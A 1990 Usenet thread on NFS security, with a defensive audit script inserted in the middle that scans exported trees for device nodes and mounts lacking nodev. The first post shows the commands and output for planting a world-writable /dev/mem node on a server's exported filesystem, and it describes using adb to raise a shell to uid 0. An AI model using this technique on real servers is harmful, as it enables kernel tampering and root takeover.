tchrist@convex.COM (Tom Christiansen) (12/20/90)
[ I've gotten nothing but confused and disbelieving mail on this,
so apparently I did not adequately describe the scenario. ]
From the keyboard of rbj@uunet.UU.NET (Root Boy Jim):
:In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.
Says who? This isn't so. I'm on my workstation. I'm the superuser.
I've got the trusting server's filesystem mounted on my system.
(It's a diskless 350, so I have to have something.) I can certainly
do the mknod. Watch (I'm root@cthulhu, my workstation):
cthulhu# df .
Filesystem kbytes used avail capacity Mounted on
globhost:/usr/spool/globdata
371967 280812 53958 84% /rmt/globhost/globdata
[ ``globhost'' is another Sun, but this works with non-Sun NFS
systems as well. ]
cthulhu# ls -lgd .
drwxrwxrwt 43 root bin 4096 Dec 19 11:52 ./
[ Even if it weren't world-write, I could become the owner
and make a world-write subdir. ]
cthulhu# ls -lg /dev/mem
crw-r----- 1 root kmem 3, 0 May 29 1990 /dev/mem
cthulhu# mknod mymem c 3 0
[ I actually have to choose the right major/minor number
for the server, not the client, if it's his kernel I
wish to crack. ]
cthulhu# ls -l mymem
crw-r--r-- 1 -2 3, 0 Dec 19 11:49 mymem
[ See, I made it fine, and it's owned by "nobody". ]
cthulhu# chmod 666 mymem
cthulhu# ls -l mymem
crw-rw-rw- 1 -2 3, 0 Dec 19 11:58 mymem
Now, go over to the server and you can write his kernel as a normal user.
I've already demo'd how to use adb to punch your shell's uid to 0,
although you should get the cred structure, too. You could also make a
nice disk device and read things if you want.
--tom
--
Tom Christiansen tchrist@convex.com convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
to look at yourself in the mirror the next morning." -me
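The post above shows why a device node written into an exported tree matters: the kernel that honours it is whichever one the node is opened on, and the squashed "nobody" ownership does not stop a normal user from opening a mode-666 node. The following audit helpers are an added example, not code from either poster. They do two defender-side checks: count device nodes on a tree the server exports (a tree like /usr/spool/globdata should normally hold none), and list mounts whose option string lacks `nodev`, since a mount carrying `nodev` will not honour device nodes stored on it, whether that is the server's own mount of the exported tree or a client's NFS mount. The mount list is a constructed /proc/mounts-style sample, not output from the original thread; `find -type c`/`-type b` and `-xdev` are assumed to be available.

```shell
#!/bin/sh
# Added audit helpers (not part of the original posts).
# Assumptions: find(1) supports -type c, -type b and -xdev; the mount list
# is in /proc/mounts format "device mountpoint fstype options dump pass".

# Print "perms links owner group ... path" for every character or block
# device node below DIR, staying on DIR's filesystem.
find_device_nodes() {
    dir=$1
    find "$dir" -xdev \( -type c -o -type b \) -exec ls -ld {} \; 2>/dev/null
}

# Count device nodes below DIR; an exported spool or data tree should be 0.
count_device_nodes() {
    find "$1" -xdev \( -type c -o -type b \) 2>/dev/null | wc -l | tr -d ' '
}

# Read mount lines on stdin and print each mountpoint whose option list
# does not contain "nodev", i.e. where a planted device node would be honoured.
mounts_without_nodev() {
    while read -r dev mnt fstype opts rest; do
        case ",$opts," in
            *,nodev,*) ;;               # nodev present: device nodes here are inert
            *) printf '%s\n' "$mnt" ;;  # no nodev: flag for review
        esac
    done
}

# Constructed sample mount table (not real output from the thread); the NFS
# line reuses the mount point shown in the post for illustration only.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
globhost:/usr/spool/globdata /rmt/globhost/globdata nfs rw,nosuid 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0'

# Run the mount check over the sample and return the flagged mount points
# as one space-separated string.
unprotected_mounts() {
    printf '%s\n' "$SAMPLE_MOUNTS" | mounts_without_nodev | tr '\n' ' '
}

# Stand-alone run: report mounts that would honour device nodes, then scan
# the exported tree if one is given on the command line.
unprotected_mounts; echo
[ -n "$1" ] && { echo "device nodes under $1:"; find_device_nodes "$1"; }
true
```

On a live server the mount check should read `/proc/mounts` (or the output of `mount`) instead of the sample, and the tree scan should be pointed at each directory listed in the server's exports file; any character or block node that turns up there, or any exported tree living on a mount without `nodev`, is worth a closer look.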
rbj@uunet.UU.NET (Root Boy Jim) (12/22/90)
In article <1990Dec19.180541.7693@convex.com> tchrist@convex.COM (Tom Christiansen) writes:
? From the keyboard of rbj@uunet.UU.NET (Root Boy Jim):
? :In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes:
? :? Do a mknod
? :? giving it the major,minor numbers of /dev/mem on the server,
? :? not the workstation.
? :
? :Um, only root can do a mknod, `nobody' can't.
?
?
? Says who? This isn't so. I'm on my workstation. I'm the superuser.
? I've got the trusting server's filesystem mounted on my system.
? (It's a diskless 350, so I have to have something.) I can certainly
? do the mknod. Watch (I'm root@cthulhu, my workstation):
OK, so you did. But you shouldn't have been able to, and will not after
you start running SunOS 4.1. I know people who know.
--
Root Boy Jim Cottrell <rbj@uunet.uu.net>
Close the gap of the dark year in between